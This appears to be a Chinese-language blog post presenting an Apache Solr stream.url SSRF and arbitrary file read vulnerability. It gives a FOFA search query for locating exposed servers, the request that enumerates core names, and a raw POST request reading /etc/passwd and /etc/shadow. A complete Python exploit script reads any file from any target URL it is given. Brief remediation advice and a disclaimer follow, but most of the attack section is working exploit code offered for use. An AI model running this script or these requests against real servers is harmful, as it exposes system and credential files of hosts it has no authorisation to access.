Apache Solr stream.url SSRF与任意文件读取漏洞(附pythonEXP脚本)

漏洞背景

Apache Solr是一个开源的搜索服务，使用Java语言开发。

Apache Solr的某些功能存在过滤不严格，在Apache Solr未开启认证的情况下，攻击者可直接构造特定请求开启特定配置，并最终造成SSRF或文件读取漏洞。目前互联网已公开漏洞poc，建议相关用户及时采取措施阻止攻击。

fofa查询

app="APACHE-Solr"

影响范围

Apache Solr 所有版本

漏洞复现

首先访问，获取实例对象的名称，实例对象的名称为 gastearsivi
/solr/admin/cores?indexInfo=false&wt=json

{
  "responseHeader":{
    "status":0,
    "QTime":0},
  "initFailures":{},
  "status":{
    "gastearsivi":{
      "name":"gastearsivi",
      "instanceDir":"/home/ec2-user/solr-8.7.0/server/solr/gastearsivi",
      "dataDir":"/home/ec2-user/solr-8.7.0/server/solr/gastearsivi/data/",
      "config":"solrconfig.xml",
      "schema":"managed-schema",
      "startTime":"2021-03-19T04:14:12.742Z",
      "uptime":4548316}}}

构造路径
"/solr/".ins."/debug/dump?param=ContentStreams&wt=json"
ins就是我们得到的实例对象的名称
构造之后为
/solr/gastearsivi/debug/dump?param=ContentStreams&wt=json
post数据包，内容为
stream.url=file:///etc/passwd

POST /solr/gastearsivi/debug/dump?param=ContentStreams&wt=json HTTP/1.1
Host: IP:PORT
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

stream.url=file:///etc/shadow

附EXP，python3运行

#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import requests
import json
import urllib
import time
import re
def Getins(url):
    try:
        ins=""
        url = url+"solr/admin/cores?indexInfo=false&wt=json"
        response = requests.get(url=url)
        data = str(response.text)
        ins = re.findall(r'\"name\":\"(.+?)\",',data)[0]
        return(ins)
    except IndexError:
        return("")

def Getfile(url,ins,filename):
    try:
        url = url+"solr/"+ins+"/debug/dump?param=ContentStreams&wt=json"
        headers ={
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        payload = str("stream.url=file://"+filename)
        response = requests.post(url=url,headers=headers,data=payload)
        data = str(response.text)
        test = re.findall(r'\"stream\":\"(.+?)\"\}]',data)[0]
        print(test.replace(r"\n","\n"))
    except IndexError:
        print("不能读取此文件")
        

if __name__ == '__main__':
    url = input("请输入测试地址:")
    filename = input("请输入读取的文件路径:")
    ins=Getins(url)
    if(ins == ""):
        print("不存在漏洞")
    else:
        Getfile(url,ins,filename)

修复建议

增加身份验证/授权，可参考官方文档：https://lucene.apache.org/solr/guide/8_6/authentication-and-authorization-plugins.html

禁止Solr API 以及管理 UI 直接对公网开放。设置防火墙，以便只允许受信任的计算机和人员访问。

脚本仅供参考，非法勿做